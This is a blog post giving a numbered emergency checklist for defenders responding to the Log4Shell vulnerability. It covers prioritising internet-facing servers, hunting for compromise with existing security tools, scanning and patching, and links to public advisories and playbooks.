Log4Shell Rapid Response 1-Page Emergency Checklist of What to do First
LOG4SHELL RAPID RESPONSE - IF THERE’S NO TIME and RESOURCES ARE SCARCE!
What to do if you’re unable to do anything else, if resources are scarce and situation is critical:
1. Assign a team as large as can be spared and dedicate them to the effort. Focus immediately on: INTERNET-FACING SERVERS first (DMZ, bare metal on prem and virtual, containers, cloud-based) tackling externally facing servers and devices first, Apache servers foremost. See: https://logging.apache.org/log4j/2.x/download.html
- Then move to critical internal servers when able. Don’t try to tackle everything all at once. Focus on what’s most important first.
2. Keep Antivirus, EDR and IDS/IPS and NGFW (Next-gen firewalls and WAFs) up-to-date and check these and SIEM / UEBA / Other tools for indicators of compromise in the network & related to Log4J - Log4Shell. Respond per normal incident response process, eradicate/clean, lock down and patch those initially exploited assets) - as soon as possible!
- HUNT for indicators of compromise and respond using the incident response process see: https://securityblue.team/log4j-hunting-and-indicators/ (note – IOCs get old fast)
- See SECTIONS 4.1, 4.2 and 4.3 at TrustedSec playbook: https://www.trustedsec.com/blog/log4j-playbook/
- See our article 2B (coming soon – link will be provided when available)
3. Use Existing Vulnerability Management and Scan Tools like Rapid7, Qualys and Tenable to detect Log4J Vulnerabilities & determine most critical – patch soonest (external first, then internal)
4. Check customer vendor portals for your products and what to do or look for related to Log4Shell and heed. Contact your security product and IT vendor representatives for any help.
5. Use the following website as a concise list to tackle things and assign critical tasks by IT function and by deadline as seen here: https://ciso.uw.edu/2021/12/10/apache-log4j-patch-now/
6. Use My Playbooks 2A and 2B (coming soon) and - for now - the CISA or ASD sites for critical info on where to go deeper https://www.cisa.gov/uscert/ncas/alerts/aa21-356a and https://www.cyber.gov.au/acsc/view-all-content/advisories/mitigating-log4shell-and-other-log4j-related-vulnerabilities and ...
7. Determine other critical systems and begin patching (internal if external is done) - have a team start to look at all systems and longer-term strategy. Use a scan tool such as Trend's or other to help: (I make no guarantees in any links herein; use completely at your own risk!) - https://github.com/NCSC-NL/log4shell (see all available items including "scanning")
8. Mentor – coach – communicate and support others. Use teamwork, be resilient, and avoid burn out! Use my playbooks to tackle systematically with less friction! (2A and 2B - coming soon)
An excellent resource (slides()worth looking at go understand this one better:
https://github.com/NCSC-NL/log4shell/blob/main/detection_mitigation/Log4Shell%20for%20OES.pdf
#RCE #Log4Shell #Infosec #Cybersecurity. - CYBER Y'ALL! - @CyberYall
Comments
Post a Comment